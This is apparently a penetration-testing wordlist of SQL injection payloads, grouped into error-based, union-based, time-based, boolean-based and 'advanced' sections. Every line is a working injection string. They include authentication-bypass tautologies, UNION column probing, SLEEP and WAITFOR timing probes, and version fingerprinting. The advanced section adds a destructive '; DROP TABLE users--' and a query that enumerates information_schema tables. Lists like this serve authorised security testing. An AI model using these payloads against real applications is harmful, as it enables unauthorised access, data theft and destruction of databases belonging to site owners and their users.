# SQL Injection Payloads
# Basic payloads for testing SQL injection vulnerabilities

# Error-based payloads
'
"
`
')
")
`)
' OR '1'='1
" OR "1"="1
` OR `1`=`1
' OR 1=1--
" OR 1=1--
` OR 1=1--
' OR 1=1#
" OR 1=1#
` OR 1=1#
' OR 1=1/*
" OR 1=1/*
` OR 1=1/*

# Union-based payloads
' UNION SELECT 1--
" UNION SELECT 1--
' UNION SELECT 1,2--
" UNION SELECT 1,2--
' UNION SELECT 1,2,3--
" UNION SELECT 1,2,3--
' UNION SELECT null--
" UNION SELECT null--
' UNION SELECT null,null--
" UNION SELECT null,null--

# Time-based payloads
'; WAITFOR DELAY '00:00:05'--
"; WAITFOR DELAY '00:00:05'--
' AND SLEEP(5)--
" AND SLEEP(5)--
' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--
" AND (SELECT * FROM (SELECT(SLEEP(5)))a)--

# Boolean-based payloads
' AND 1=1--
" AND 1=1--
' AND 1=2--
" AND 1=2--
' AND (SELECT SUBSTRING(@@version,1,1))='5'--
" AND (SELECT SUBSTRING(@@version,1,1))='5'--

# Advanced payloads
'; DROP TABLE users--
"; DROP TABLE users--
' OR EXISTS(SELECT * FROM users)--
" OR EXISTS(SELECT * FROM users)--
' UNION SELECT table_name FROM information_schema.tables--
" UNION SELECT table_name FROM information_schema.tables--
